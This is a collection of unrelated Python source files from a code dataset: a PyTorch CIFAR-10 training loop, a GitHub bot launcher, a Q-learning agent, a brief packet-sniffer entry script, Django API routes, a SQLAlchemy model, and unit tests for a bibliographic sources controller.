x = x.reshape(x.shape[0], -1)
x = self.fc(x)
#x = x.reshape(x.shape[0], 3, 32, 32)
#x = self.conv2(x)
x = self.relu(x)
#x = x.reshape(x.shape[0], -1)
return x
def run_model():
# transforms_train = transforms.Compose([
# transforms.RandomCrop(32, padding=4),
# transforms.RandomHorizontalFlip(),
# transforms.ToTensor(),
# transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
# ])
# transforms_test = transforms.Compose([
# transforms.ToTensor(),
# transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
# ])
start_time = time.time()
num_epochs = 10
device = torch.device('cuda')
# Loads the train and test data into PyTorch tensors
training_data = datasets.CIFAR10(root = "data", train = True, download = True, transform = ToTensor()) #transforms_train
#test_data = datasets.CIFAR10(root = "data", train = False, download = True, transform = ToTensor()) # Not used # transforms_test
training_data, validation_set = random_split(training_data, [45000, 5000])
# Loads the data into batches
train_dataloader = DataLoader(training_data, batch_size = 500, shuffle = True)
valid_dataloader = DataLoader(validation_set, batch_size = 500, shuffle = True)
model = CircResNet().to(device)
params = []
params += model.parameters()
loss_f = nn.MSELoss() #nn.CrossEntropyLoss()
optimizer = optim.Adam(params, lr = 1e-2, weight_decay = 1e-7) # Best lr = 0.001 # weight_decay = 1e-6
#scheduler = lr_s.MultiStepLR(optimizer, milestones = [20, 80], gamma = 0.1)
scheduler = lr_s.ExponentialLR(optimizer, gamma = 0.9)
old_loss = 10000
times_worse = 0
for epoch in range(num_epochs):
print('Epoch: ', epoch)
train_loss = 0.0
for batch_idx, (data, labels) in enumerate(train_dataloader):
#print(batch_idx)
data = data.to(device = device)
labels = labels.to(device = device)
flattened = data.clone().detach().reshape(data.shape[0], -1)
scores = model(data) # Runs a forward pass of the model for all the data
loss = loss_f(scores, flattened) # Calculates the loss of the forward pass using the loss function
train_loss += loss
optimizer.zero_grad() # Resets the optimizer gradients to zero for each batch
loss.backward() # Backpropagates the network using the loss to calculate the local gradients
optimizer.step() # Updates the network weights and biases
valid_loss = 0.0
model.eval()
for data, labels in valid_dataloader:
if torch.cuda.is_available():
data, labels = data.cuda(), labels.cuda()
target = model(model.dropout(data))
loss = loss_f(target, flattened)
valid_loss = loss.item() * data.size(0)
scheduler.step()
print('Validation Loss: ', valid_loss)
if valid_loss >= old_loss:
times_worse += 1
else:
times_worse = 0
if times_worse >= 3:
print('Reducing learning rate.')
if times_worse >= 6:
print('Stopping early.')
start_time = time.time()
break
old_loss = valid_loss
print('\n')
torch.save(model.state_dict(), 'circ-resnet.pickle')
print('Saved to .pickle file')
print('Finished in %s seconds' % round(time.time() - start_time, 1))
if __name__ == '__main__':
run_model() | StarcoderdataPython |
6644348 | <filename>run.py
import os
import sys
from baldrick import create_app
# Configure the app
app = create_app('astropy-bot')
# Load plugins from baldrick
import baldrick.plugins.github_milestones # noqa
# Load astropy-specific plugins
import astropy_bot.changelog_checker # noqa
import astropy_bot.autolabel # noqa
# Bind to PORT if defined, otherwise default to 5000.
port = int(os.environ.get('PORT', 5000))
if '--skip-run' not in sys.argv:
app.run(host='0.0.0.0', port=port, debug=False)
| StarcoderdataPython |
285822 | from extended_rl.prerandom import agentrandom
class Q_learner:
"""
Basic Q-learning agent, see https://en.wikipedia.org/wiki/Q-learning.
"""
def __init__(self, epsilon=0.9, learning_rate=0.1, gamma=0.9, **kwags):
self.epsilon = epsilon
self.learning_rate = learning_rate
self.gamma = gamma
self.actions = range(self.n_actions)
self.qtable = {}
self.rand_counter = 0
def act(self, obs):
qtable, epsilon, actions = self.qtable, self.epsilon, self.actions
maybe_add_obs_to_qtable(qtable, actions, obs)
if agentrandom.random(self.rand_counter) > epsilon:
return agentrandom.randrange(self.n_actions, self.rand_counter+1)
elif all(qtable[obs,a]==0 for a in actions):
return agentrandom.randrange(self.n_actions, self.rand_counter+1)
else:
return max(actions, key=lambda a: qtable[obs,a])
def train(self, o_prev, a, r, o_next):
qtable, actions, gamma = self.qtable, self.actions, self.gamma
maybe_add_obs_to_qtable(qtable, actions, o_prev)
maybe_add_obs_to_qtable(qtable, actions, o_next)
qtarget = r + gamma * max([qtable[o_next,actn] for actn in actions])
qpredict = qtable[o_prev, a]
qtable[o_prev, a] += self.learning_rate * (qtarget - qpredict)
self.rand_counter += 2
def maybe_add_obs_to_qtable(qtable, actions, obs):
if not((obs, 0) in qtable):
qtable.update({(obs, a): 0 for a in actions}) | StarcoderdataPython |
4890910 | <filename>man_in_the_middle/sniffer.py
from src.mitm import get_args, sniffer
interface = get_args()
sniffer(interface) | StarcoderdataPython |
1801323 | from django.conf.urls import url
from products import views
urlpatterns = [
url(
regex=r"^on-sale/$",
view=views.home,
name="landing_page"
),
url(
regex=r"^$",
view=views.ProductsListView.as_view(),
name="deals_page"
),
url(
regex=r"^all-beers/$",
view=views.ProductsListView.as_view(),
name='product-list'
),
# /stores
url(
regex=r"^stores/$",
view=views.stores,
name="api-stores"
),
# /stores/{store_id}
url(
regex=r"^stores/(?P<store_id>[0-9]+)/$",
view=views.store_by_id,
name="api-stores-id"
),
# /products
url(
regex=r"^products/$",
view=views.products,
name="api-products"
),
# /beers
url(
regex=r"^beers/$",
view=views.beers,
name="api-beers"
),
# /beers/{product_id}
url(
regex=r"^beers/(?P<beer_id>[0-9]+)/$",
view=views.beer_by_id,
name="beer_store_api"
),
# /beers/{product_id}
url(
regex=r"^beer_prices/(?P<beer_id>[0-9]+)/$",
view=views.beer_prices_by_id,
name="beer_store_api"
),
# /beers/{product_id}
url(
regex=r"^beers/(?P<beer_id>[0-9]+)/products/$",
view=views.beer_products,
name="beer_store_api"
),
# /products/{product_id}
url(
regex=r"^products/(?P<product_id>[0-9]+)/$",
view=views.product_by_id,
name="beer_store_api"
),
# /product_prices/{product_id}
url(
regex=r"^product_prices/(?P<product_id>[0-9]+)/$",
view=views.product_prices_by_id,
name="beer_store_api"
),
# /stores/{store_id}/products
url(
regex=r"^stores/(?P<store_id>[0-9]+)/products/$",
view=views.products_at_store,
name="beer_store_api"
),
# /products/{product_id}/stores
url(
regex=r"^products/(?P<product_id>[0-9]+)/stores/$",
view=views.stores_with_product,
name="beer_store_api"
),
url(r'^search/?$', view=views.search, name='beer_search'),
]
| StarcoderdataPython |
3400643 | <filename>web/app/syzygy/subscriptions/model.py
"""/web/app/syzygy/subscriptions/model.py
Author: <NAME> (<EMAIL>)
[Description]
Classes:
[ClassesList]
Functions:
[FunctionsList]
"""
import logging
from app import db
log = logging.getLogger(__name__)
class Subscription(db.Model):
"""[summary]
:param db: [description]
:type db: [type]
:return: [description]
:rtype: [type]
"""
__tablename__ = "subscriptions"
id = db.Column(db.Integer, primary_key=True)
userid = db.Column(db.Integer)
user = db.relationship()
tier = db.Column(db.Integer)
recurring = db.Column(db.Boolean)
subscription_ends = db.Column(db.DateTime)
def __init__(self, **kwargs):
super(Subscription, self).__init__(**kwargs)
def update(self, changes: dict):
for key, val in changes.items():
setattr(self, key, val)
return self
| StarcoderdataPython |
6654630 | <gh_stars>1-10
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import datetime
import logging
import simplejson as json
from time import sleep
from nose.tools import nottest
from onlinelinguisticdatabase.tests import TestController, url
import onlinelinguisticdatabase.model as model
from onlinelinguisticdatabase.model.meta import Session
import onlinelinguisticdatabase.lib.helpers as h
from onlinelinguisticdatabase.model import Source
from onlinelinguisticdatabase.lib.bibtex import entry_types
from onlinelinguisticdatabase.lib.SQLAQueryBuilder import SQLAQueryBuilder
log = logging.getLogger(__name__)
################################################################################
# Functions for creating & retrieving test data
################################################################################
today_timestamp = datetime.datetime.now()
day_delta = datetime.timedelta(1)
yesterday_timestamp = today_timestamp - day_delta
def _create_test_models(n=100):
_add_test_models_to_session('File', n, ['name'])
Session.commit()
def _add_test_models_to_session(model_name, n, attrs):
for i in range(1, n + 1):
m = getattr(model, model_name)()
for attr in attrs:
setattr(m, attr, u'%s %s' % (attr, i))
Session.add(m)
def _get_test_models():
return {'files': h.get_files()}
def _create_test_sources(n=100):
"""Create n sources with various properties. A testing ground for searches!
"""
files = _get_test_models()['files']
for i in range(1, n + 1):
s = model.Source()
s.key = unicode(i)
if i in range(1, 11):
s.type = u'article'
s.author = u'Author Mc%d' % i
s.title = u'Title %d' % i
s.journal = u'Journal %d' % i
s.year = int('199%s' % str(i)[-1])
elif i in range(11, 21):
s.type = u'book'
s.author = u'Author Mc%d' % i
s.title = u'Title %d' % i
s.journal = u'Publisher %d' % i
s.year = int('199%s' % str(i)[-1])
elif i in range(21, 31):
s.type = u'booklet'
s.title = u'Title %d' % i
elif i in range(31, 41):
s.type = u'conference'
s.author = u'Author Mc%d' % i
s.title = u'Title %d' % i
s.booktitle = u'Book Title %d' % i
s.year = int('199%s' % str(i)[-1])
elif i in range(41, 51):
s.type = u'inbook'
s.editor = u'Editor Mc%d' % i
s.title = u'Title %d' % i
s.chapter = unicode(i)
s.pages = u'9--36'
s.publisher = u'Publisher %d' % i
s.year = int('199%s' % str(i)[-1])
elif i in range(51, 61):
s.type = u'incollection'
s.author = u'Author Mc%d' % i
s.title = u'Title %d' % i
s.booktitle = u'Book Title %d' % i
s.publisher = u'Publisher %d' % i
s.year = int('199%s' % str(i)[-1])
elif i in range(61, 71):
s.type = u'inproceedings'
s.author = u'Author Mc%d' % i
s.title = u'Title %d' % i
s.booktitle = u'Book Title %d' % i
s.year = int('199%s' % str(i)[-1])
elif i in range(71, 81):
s.type = u'manual'
s.title = u'Title %d' % i
elif i in range(81, 91):
s.type = u'mastersthesis'
s.author = u'Author Mc%d' % i
s.title = u'Title %d' % i
s.school = u'The University of %d' % i
s.year = int('199%s' % str(i)[-1])
else:
s.type = u'misc'
if i % 2 == 0:
s.file_id = files[i - 1].id
if i > 8:
s.datetime_modified = yesterday_timestamp
Session.add(s)
Session.commit()
def _create_test_data(n=100):
_create_test_models(n)
_create_test_sources(n)
class TestSourcesController(TestController):
@nottest
def test_index(self):
"""Tests that GET /sources returns an array of all sources and that order_by and pagination parameters work correctly."""
# Add 100 sources.
def create_source_from_index(index):
source = model.Source()
source.type = u'book'
source.key = u'key%d' % index
source.author = u'<NAME>.'
source.title = u'Syntactic Structures %d' % index
source.publisher = u'Mouton'
source.year = 1957
return source
sources = [create_source_from_index(i) for i in range(1, 101)]
Session.add_all(sources)
Session.commit()
sources = h.get_sources(True)
sources_count = len(sources)
# Test that GET /sources gives us all of the sources.
extra_environ = self.extra_environ_view
response = self.app.get(url('sources'), headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp) == sources_count
assert resp[0]['title'] == u'Syntactic Structures 1'
assert resp[0]['id'] == sources[0].id
assert response.content_type == 'application/json'
# Test the paginator GET params.
paginator = {'items_per_page': 23, 'page': 3}
response = self.app.get(url('sources'), paginator, headers=self.json_headers,
extra_environ=extra_environ)
resp = json.loads(response.body)
assert len(resp['items']) == 23
assert resp['items'][0]['title'] == sources[46].title
assert response.content_type == 'application/json'
# Test the order_by GET params.
order_by_params = {'order_by_model': 'Source', 'order_by_attribute': 'title',
'order_by_direction': 'desc'}
response = self.app.get(url('sources'), order_by_params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
result_set = sorted([s.title for s in sources], reverse=True)
assert result_set == [s['title'] for s in resp]
assert response.content_type == 'application/json'
# Test the order_by *with* paginator.
params = {'order_by_model': 'Source', 'order_by_attribute': 'title',
'order_by_direction': 'desc', 'items_per_page': 23, 'page': 3}
response = self.app.get(url('sources'), params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert result_set[46] == resp['items'][0]['title']
# Expect a 400 error when the order_by_direction param is invalid
order_by_params = {'order_by_model': 'Source', 'order_by_attribute': 'title',
'order_by_direction': 'descending'}
response = self.app.get(url('sources'), order_by_params, status=400,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert resp['errors']['order_by_direction'] == u"Value must be one of: asc; desc (not u'descending')"
assert response.content_type == 'application/json'
# Expect the default BY id ASCENDING ordering when the order_by_model/Attribute
# param is invalid.
order_by_params = {'order_by_model': 'Sourceful', 'order_by_attribute': 'titular',
'order_by_direction': 'desc'}
response = self.app.get(url('sources'), order_by_params,
headers=self.json_headers, extra_environ=extra_environ)
resp = json.loads(response.body)
assert resp[0]['id'] == sources[0].id
# Expect a 400 error when the paginator GET params are empty
# or are integers less than 1
paginator = {'items_per_page': u'a', 'page': u''}
response = self.app.get(url('sources'), paginator, headers=self.json_headers,
extra_environ=extra_environ, status=400)
resp = json.loads(response.body)
assert resp['errors']['items_per_page'] == u'Please enter an integer value'
assert resp['errors']['page'] == u'Please enter a value'
assert response.content_type == 'application/json'
paginator = {'items_per_page': 0, 'page': -1}
response = self.app.get(url('sources'), paginator, headers=self.json_headers,
extra_environ=extra_environ, status=400)
resp = json.loads(response.body)
assert resp['errors']['items_per_page'] == u'Please enter a number that is 1 or greater'
assert resp['errors']['page'] == u'Please enter a number that is 1 or greater'
assert response.content_type == 'application/json'
@nottest
def test_create(self):
"""Tests that POST /sources creates a new source or returns an appropriate error
if the input is invalid.
"""
########################################################################
# BOOK
########################################################################
# Attempt to create a source that has an invalid BibTeX entry type and
# expect to fail. Also, check that the length restrictions on the other
# fields are working too.
params = self.source_create_params.copy()
params.update({
'type': u'novella',
'author': u'author' * 255
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
assert resp['errors']['type'] == u'novella is not a valid BibTeX entry type'
assert resp['errors']['author'] == u'Enter a value not more than 255 characters long'
assert response.content_type == 'application/json'
# Create a book; required: author or editor, title, publisher and year
params = self.source_create_params.copy()
params.update({
'type': u'bOOk', # case is irrelevant for entry types
'key': u'chomsky57',
'author': u'<NAME>',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957,
'edition': u'second', # good optional attribute for a book
'school': u'Stanford' # doesn't make sense for a book, but it will still be saved
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = Session.query(Source).count()
assert resp['type'] == u'book' # the OLD converts type to lowercase
assert resp['school'] == u'Stanford'
assert resp['edition'] == u'second'
assert resp['booktitle'] == u''
assert resp['author'] == u'<NAME>'
assert response.content_type == 'application/json'
# Attempt to create another book with the same key and expect to fail.
params = self.source_create_params.copy()
params.update({
'type': u'bOOk',
'key': u'chomsky57', # This duplicate is the bad part.
'author': u'<NAME>',
'title': u'Structures Syntax-wise',
'publisher': u'Backwoods Publishing',
'year': 1984
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors']['key'] == u'The submitted source key is not unique'
assert response.content_type == 'application/json'
# Attempt to create another book with an invalid key and expect to fail.
params = self.source_create_params.copy()
params.update({
'type': u'bOOk',
'key': u'cho\u0301msky57', # Unicode characters are not permitted, PERHAPS THEY SHOULD BE? ...
'author': u'<NAME>',
'title': u'Structures Syntax-wise',
'publisher': u'Backwoods Publishing',
'year': 1984
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors']['key'] == u'Source keys can only contain letters, numerals and symbols (except the comma)'
# Attempt to create a book source that is invalid because it lacks a year.
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57a',
'author': u'<NAME>',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'edition': u'second' # good optional attribute for a book
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['errors'] == \
u'Sources of type book require values for title, publisher and year as well as a value for at least one of author and editor.'
assert sources_count == new_sources_count
assert response.content_type == 'application/json'
# Attempt to create a book source that is invalid because it lacks both
# author and editor
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57a',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['errors'] == \
u'Sources of type book require values for title, publisher and year as well as a value for at least one of author and editor.'
assert sources_count == new_sources_count
assert response.content_type == 'application/json'
########################################################################
# ARTICLE
########################################################################
# Create an article; required: author, title, journal, year
params = self.source_create_params.copy()
params.update({
'type': u'Article', # case is irrelevant for entry types
'key': u'bloomfield46',
'author': u'<NAME>.',
'title': u'Algonquian',
'year': 1946,
'journal': u'Linguistic Structures of Native America',
'pages': u'85--129'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'article' # the OLD converts type to lowercase
assert resp['title'] == u'Algonquian'
assert resp['author'] == u'<NAME>.'
assert resp['journal'] == u'Linguistic Structures of Native America'
assert resp['pages'] == u'85--129'
assert resp['year'] == 1946
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Attempt to create an article without a year and expect to fail
params = self.source_create_params.copy()
params.update({
'type': u'Article', # case is irrelevant for entry types
'key': u'bloomfieldL46',
'author': u'<NAME>.',
'title': u'Algonquian',
'journal': u'Linguistic Structures of Native America',
'pages': u'85--129'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = Session.query(Source).count()
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors'] == \
u'Sources of type article require values for author, title, journal and year.'
assert response.content_type == 'application/json'
########################################################################
# BOOKLET
########################################################################
# Create a booklet; required: title
params = self.source_create_params.copy()
params.update({
'type': u'BOOKLET', # case is irrelevant for entry types
'key': u'mypoetry',
'title': u'My Poetry (unpublished)'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'booklet' # the OLD converts type to lowercase
assert resp['title'] == u'My Poetry (unpublished)'
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Attempt to create a booklet without a title and expect to fail
params = self.source_create_params.copy()
params.update({
'type': u'Booklet', # case is irrelevant for entry types
'key': u'mypoetry2',
'author': '<NAME>'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = Session.query(Source).count()
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors'] == \
u'Sources of type booklet require a value for title.'
assert response.content_type == 'application/json'
########################################################################
# INBOOK
########################################################################
# Create an inbook; required: title, publisher, year and one of author
# or editor and one of chapter or pages.
params = self.source_create_params.copy()
params.update({
'type': u'inbook', # case is irrelevant for entry types
'key': u'vendler67',
'title': u'Linguistics in Philosophy',
'publisher': u'Cornell University Press',
'year': 1967,
'author': '<NAME>',
'chapter': u'4'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
inbook_id = resp['id']
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'inbook' # the OLD converts type to lowercase
assert resp['title'] == u'Linguistics in Philosophy'
assert resp['publisher'] == u'Cornell University Press'
assert resp['year'] == 1967
assert resp['author'] == u'<NAME>'
assert resp['chapter'] == u'4'
assert resp['pages'] == u''
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Attempt to create an inbook without a chapter or pages and expect to fail
params = self.source_create_params.copy()
params.update({
'type': u'inbook', # case is irrelevant for entry types
'key': u'vendler67again',
'title': u'Linguistics in Philosophy',
'publisher': u'Cornell University Press',
'year': 1967,
'author': '<NAME>'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = Session.query(Source).count()
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert sources_count == new_sources_count
assert resp['errors'] == \
u'Sources of type inbook require values for title, publisher and year as well as a value for at least one of author and editor and at least one of chapter and pages.'
assert response.content_type == 'application/json'
# 'required': (('author', 'editor'), 'title', ('chapter', 'pages'), 'publisher', 'year')
# Create a book that the inbook above will cross-reference once updated.
# required: author or editor, title, publisher and year
params = self.source_create_params.copy()
params.update({
'type': u'bOOk', # case is irrelevant for entry types
'key': u'vendler67book',
'author': u'<NAME>',
'title': u'Linguistics in Philosophy',
'publisher': u'Cornell University Press',
'year': 1967
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'book' # the OLD converts type to lowercase
assert resp['title'] == u'Linguistics in Philosophy'
assert resp['author'] == u'<NAME>'
assert resp['year'] == 1967
assert resp['publisher'] == u'Cornell University Press'
assert resp['key'] == u'vendler67book'
assert response.content_type == 'application/json'
# Now update the valid inbook created above and have it cross-reference
# the book just created above. Because the Vendler book has all of the
# rest of the attributes, all we need to specify is the chapter.
params = self.source_create_params.copy()
params.update({
'type': u'inbook', # case is irrelevant for entry types
'key': u'vendler67',
'chapter': u'4',
'crossref': u'vendler67book'
})
params = json.dumps(params)
response = self.app.put(url('source', id=inbook_id), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
assert resp['type'] == u'inbook' # the OLD converts type to lowercase
assert resp['crossref_source']['title'] == u'Linguistics in Philosophy'
assert resp['crossref_source']['publisher'] == u'Cornell University Press'
assert resp['crossref_source']['year'] == 1967
assert resp['crossref_source']['author'] == u'<NAME>'
assert resp['chapter'] == u'4'
# Now update our inbook back to how it was and remove the cross-reference;
# make sure that the crossref_source value is now None.
params = self.source_create_params.copy()
params.update({
'type': u'inbook', # case is irrelevant for entry types
'key': u'vendler67',
'title': u'Linguistics in Philosophy',
'publisher': u'Cornell University Press',
'year': 1967,
'author': '<NAME>',
'chapter': u'4'
})
params = json.dumps(params)
response = self.app.put(url('source', id=inbook_id), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'inbook' # the OLD converts type to lowercase
assert resp['title'] == u'Linguistics in Philosophy'
assert resp['publisher'] == u'Cornell University Press'
assert resp['year'] == 1967
assert resp['author'] == u'<NAME>'
assert resp['chapter'] == u'4'
assert resp['pages'] == u''
assert resp['crossref'] == u''
assert resp['crossref_source'] == None
assert new_sources_count == sources_count
assert response.content_type == 'application/json'
########################################################################
# MISC
########################################################################
# Create a misc; required: nothing.
params = self.source_create_params.copy()
params.update({
'type': u'misc', # case is irrelevant for entry types
'key': u'manuel83',
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert resp['type'] == u'misc' # the OLD converts type to lowercase
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
########################################################################
# INPROCEEDINGS
########################################################################
# Create an inproceedings; required: author, title, booktitle, year.
params = self.source_create_params.copy()
params.update({
'type': u'inpROceedings', # case is irrelevant for entry types
'key': u'oaho83',
'title': u'On Notions of Information Transfer in {VLSI} Circuits',
'booktitle': u'Proc. Fifteenth Annual ACM',
'year': 1983,
'author': u'<NAME> and <NAME> and <NAME>'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
inproceedings_id = resp['id']
assert resp['type'] == u'inproceedings' # the OLD converts type to lowercase
assert resp['title'] == u'On Notions of Information Transfer in {VLSI} Circuits'
assert resp['booktitle'] == u'Proc. Fifteenth Annual ACM'
assert resp['year'] == 1983
assert resp['author'] == u'<NAME> and <NAME> and <NAME>'
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Attempt to create an inproceedings that lacks booktitle and year
# values; expect to fail.
params = self.source_create_params.copy()
params.update({
'type': u'inpROceedings', # case is irrelevant for entry types
'key': u'<KEY>',
'title': u'On Notions of Information Transfer in {VLSI} Circuits',
'author': '<NAME> and <NAME> and <NAME>'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin, status=400)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert new_sources_count == sources_count
assert response.content_type == 'application/json'
assert resp['errors'] == u'Sources of type inproceedings require values for author, title, booktitle and year.'
# Now create a proceedings source that will be cross-referenced by the
# above inproceedings source.
params = self.source_create_params.copy()
params.update({
'type': u'PROceedings', # case is irrelevant for entry types
'key': u'<KEY>',
'title': u'Proc. Fifteenth Annual',
'booktitle': u'Proc. Fifteenth Annual ACM',
'year': 1983
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
proceedings_id = resp['id']
assert resp['type'] == u'proceedings' # the OLD converts type to lowercase
assert resp['title'] == u'Proc. Fifteenth Annual'
assert resp['booktitle'] == u'Proc. Fifteenth Annual ACM'
assert resp['year'] == 1983
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
# Now attempt to create an inproceedings that lacks booktitle and year
# values but cross-reference the proceedings source we just created; expect to succeed.
params = self.source_create_params.copy()
params.update({
'type': u'inpROceedings', # case is irrelevant for entry types
'key': u'<KEY>',
'title': u'On Notions of Information Transfer in {VLSI} Circuits',
'author': u'<NAME> and <NAME> and <NAME>',
'crossref': u'acm15_83'
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
assert resp['type'] == u'inproceedings' # the OLD converts type to lowercase
assert resp['title'] == u'On Notions of Information Transfer in {VLSI} Circuits'
assert resp['crossref_source']['booktitle'] == u'Proc. Fifteenth Annual ACM'
assert resp['crossref_source']['year'] == 1983
assert resp['author'] == u'<NAME> and <NAME> and <NAME>'
assert new_sources_count == sources_count + 1
assert response.content_type == 'application/json'
assert resp['crossref_source']['id'] == proceedings_id
# Make sure the crossref stuff works with updates
params = self.source_create_params.copy()
params.update({
'type': u'inpROceedings', # case is irrelevant for entry types
'key': u'oaho83',
'title': u'On Notions of Information Transfer in {VLSI} Circuits',
'author': u'<NAME> and <NAME> and <NAME>',
'crossref': u'acm15_83'
})
params = json.dumps(params)
response = self.app.put(url('source', id=inproceedings_id), params,
self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
sources_count = new_sources_count
new_sources_count = Session.query(Source).count()
assert response.content_type == 'application/json'
assert resp['type'] == u'inproceedings' # the OLD converts type to lowercase
assert resp['title'] == u'On Notions of Information Transfer in {VLSI} Circuits'
assert resp['crossref_source']['booktitle'] == u'Proc. Fifteenth Annual ACM'
assert resp['crossref_source']['year'] == 1983
assert resp['author'] == u'<NAME> and <NAME> and <NAME>'
assert new_sources_count == sources_count
assert response.content_type == 'application/json'
assert resp['crossref_source']['id'] == proceedings_id
@nottest
def test_new(self):
"""Tests that GET /sources/new returns the list of valid BibTeX entry types."""
response = self.app.get(url('new_source'), headers=self.json_headers,
extra_environ=self.extra_environ_contrib)
resp = json.loads(response.body)
assert resp['types'] == sorted(entry_types.keys())
assert response.content_type == 'application/json'
@nottest
def test_update(self):
"""Tests that PUT /sources/1 updates an existing source."""
# Create a book to update.
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57',
'author': u'<NAME>',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957
})
params = json.dumps(params)
response = self.app.post(url('sources'), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
source_count = Session.query(Source).count()
book_id = resp['id']
original_datetime_modified = resp['datetime_modified']
# Update the book
sleep(1) # sleep for a second to ensure that MySQL registers a different datetime_modified for the update
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57',
'author': u'<NAME>.', # Change the format of the author
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957
})
params = json.dumps(params)
response = self.app.put(url('source', id=book_id), params, self.json_headers,
self.extra_environ_admin)
resp = json.loads(response.body)
datetime_modified = resp['datetime_modified']
new_source_count = Session.query(Source).count()
assert source_count == new_source_count
assert datetime_modified != original_datetime_modified
assert response.content_type == 'application/json'
# Attempt an update with no new input and expect to fail
sleep(1) # sleep for a second to ensure that MySQL could register a different datetime_modified for the update
params = self.source_create_params.copy()
params.update({
'type': u'book',
'key': u'chomsky57',
'author': u'<NAME>.',
'title': u'Syntactic Structures',
'publisher': u'Mouton',
'year': 1957
})
params = json.dumps(params)
response = self.app.put(url('source', id=book_id), params, self.json_headers,
